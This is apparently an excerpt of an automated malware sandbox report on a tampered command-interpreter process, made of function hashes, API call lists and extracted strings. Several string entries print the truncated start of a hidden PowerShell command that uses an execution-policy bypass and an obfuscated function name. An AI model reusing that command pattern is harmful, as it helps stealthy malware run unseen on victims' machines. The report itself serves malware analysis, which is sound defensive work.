                                                                                                                      • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                      • API String ID: 2060774286-969133440
                                                                                                                      • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                      • Instruction ID: ccb66dcd33a02d0ffe406fcad70186da03e5273b36123d48c4b9630015d3967c
                                                                                                                      • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                      • Instruction Fuzzy Hash: 5AB17225A0DE8281EA608B1D9488279E7A0FF4AFA4F554236CA5EC77B4DF3CEC558700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ$NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){$HJBVM=[System.Secu
                                                                                                                      • API String ID: 0-286494561
                                                                                                                      • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                      • Instruction ID: 8fa1f6ee290fdf6532f2c107a1c70f30921486b8ed21701645013e354e4328ef
                                                                                                                      • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                      • Instruction Fuzzy Hash: BA516929A0CE53C6FB549F20E4443B8ABA1BF55FA9F405036DA0EC66B5DF3CAC468701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                      • String ID: 0123456789$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX
                                                                                                                      • API String ID: 1606811317-1934752915
                                                                                                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                      • Instruction ID: 5e2df4a1ebe73c5c48e9c9cdd219d8ddbac8db37b9d5f22b0f319a26a386f6a9
                                                                                                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                      • Instruction Fuzzy Hash: 36D19029A08E8292EA508B29A840179B7A0FF45FB4F845132DE6ED77B5DF3CEC15C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                                                                      • String ID: %04X-%04X$~
                                                                                                                      • API String ID: 2748242238-2468825380
                                                                                                                      • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                      • Instruction ID: 0c288460468142ccad92143f6a5e32a9b365263dcaf035a1ef4376a9bf912e06
                                                                                                                      • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                      • Instruction Fuzzy Hash: FBA17266709FC1CAEB258F21D8402E9B7A1FB85F94F408135DA4D8BB69DF3CDA458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                      • API String ID: 2348642995-441775793
                                                                                                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                      • Instruction ID: 3881cb66ca690c921efd156e9419d1cc882bf004edaefe0833ab4cd679ab186a
                                                                                                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                      • Instruction Fuzzy Hash: 23716D7AD08E46C5E7605F25D410179F7A0EB49FA8F68D032DA4EC62A5EF3CE984C721
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                      • String ID: FAT$~
                                                                                                                      • API String ID: 2238823677-1832570214
                                                                                                                      • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                      • Instruction ID: 06c52c93fde41796efe2c4c7356c8bcdc0fa0084f3097c1c1c51e4a471e33e06
                                                                                                                      • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                      • Instruction Fuzzy Hash: 66717E36608FC1C9EB61CF25D8502EAB7A4FB45F98F408036DA4D8BB69DF38DA458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD884
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD89D
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD94D
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FD964
                                                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF6154FDB89
                                                                                                                      • wcstol.MSVCRT ref: 00007FF6154FDBDF
                                                                                                                      • wcstol.MSVCRT ref: 00007FF6154FDC63
                                                                                                                      • memmove.MSVCRT ref: 00007FF6154FDD33
                                                                                                                      • memmove.MSVCRT ref: 00007FF6154FDE9A
                                                                                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF6155351B2,00007FF6154FFE2A), ref: 00007FF6154FDF1F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1051989028-0
                                                                                                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                      • Instruction ID: 2c8f0d18d96ec33c8e625eb04d8f58fa342ed2043f75fd8c8ab445d2a2c0139e
                                                                                                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                      • Instruction Fuzzy Hash: 52026276A08E8181EB249F1DE44427AB7A1FB45FA4F554232DAEE837A4DF7CD861C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                      • API String ID: 3223794493-3086019870
                                                                                                                      • Opcode ID: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                                      • Instruction ID: c456483154f0e06ef58ce098f5f2513dd1875c9a7324b8276e7d294ab630e5a8
                                                                                                                      • Opcode Fuzzy Hash: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                                      • Instruction Fuzzy Hash: 73515E39A08E42C6FA548F29A850179BBA0FB49F74F585536CA1E873B1EF3CE855C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6155058E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF61551C6DB), ref: 00007FF6155058EF
                                                                                                                        • Part of subcall function 00007FF61550081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF61550084E
                                                                                                                      • towupper.MSVCRT ref: 00007FF61551C1C9
                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF61551C31C
                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF61551C5CB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                      • String ID: %s $%s>$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX$PROMPT$Unknown$\$x
                                                                                                                      • API String ID: 2242554020-4229170036
                                                                                                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                      • Instruction ID: ba75d7c814e1ead325304321f3b9b455760ee17ce7395e2c8cdb1f611546ece8
                                                                                                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                      • Instruction Fuzzy Hash: 86127029A18E5281EA649F29E48417AABB0EF44FB4F554236D99E837F0DF3DED41C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                      • String ID: \\.\
                                                                                                                      • API String ID: 799470305-2900601889
                                                                                                                      • Opcode ID: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                                                      • Instruction ID: 8d63d665b7988feeac4a21a575676276861c5b078103f8b62407f5e8eae0ee79
                                                                                                                      • Opcode Fuzzy Hash: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                                                                                                      • Instruction Fuzzy Hash: 9D519836A18E82C5EB608F21D8102B9B7A0FF89F68F594536DA5EC77A4DF3CD9458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1944892715-0
                                                                                                                      • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                      • Instruction ID: dbe14818d678b9d412327ca7badd2c1a5a300e45dfa0dcadf52d0719ff2a4a78
                                                                                                                      • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                      • Instruction Fuzzy Hash: 6CB16C35A09E52C6FA649F29A854179E6A1AF55FB4F458536CA4ECB3B1EF3CEC408300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154F54DE
                                                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6154F552B
                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6154F554F
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF61551345F
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF61551347E
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6155134C3
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6155134DB
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6154F1F7D), ref: 00007FF6155134FA
                                                                                                                        • Part of subcall function 00007FF6155036EC: _get_osfhandle.MSVCRT ref: 00007FF615503715
                                                                                                                        • Part of subcall function 00007FF6155036EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615503770
                                                                                                                        • Part of subcall function 00007FF6155036EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615503791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1356649289-0
                                                                                                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                      • Instruction ID: f8623ab528c641204bc2f2149f410dd746a06c768809012053ecc196fa741ce7
                                                                                                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                      • Instruction Fuzzy Hash: 28919F36A08A42C7EB149F25A444179FBA1FB88FA4F554135DA4E837B6DF3CE844CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                      • String ID: %s$/-.$:
                                                                                                                      • API String ID: 1644023181-879152773
                                                                                                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                      • Instruction ID: 6487581f81cdd79a75423716c64c83da0dcdea4a9ab13424493dbfa5ea629eb8
                                                                                                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                      • Instruction Fuzzy Hash: 9691716AA08E4295EB649F24D4902BEABB0EF44FA4F844536D94EC26E5DF3CED45C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF615517251), ref: 00007FF61551628E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
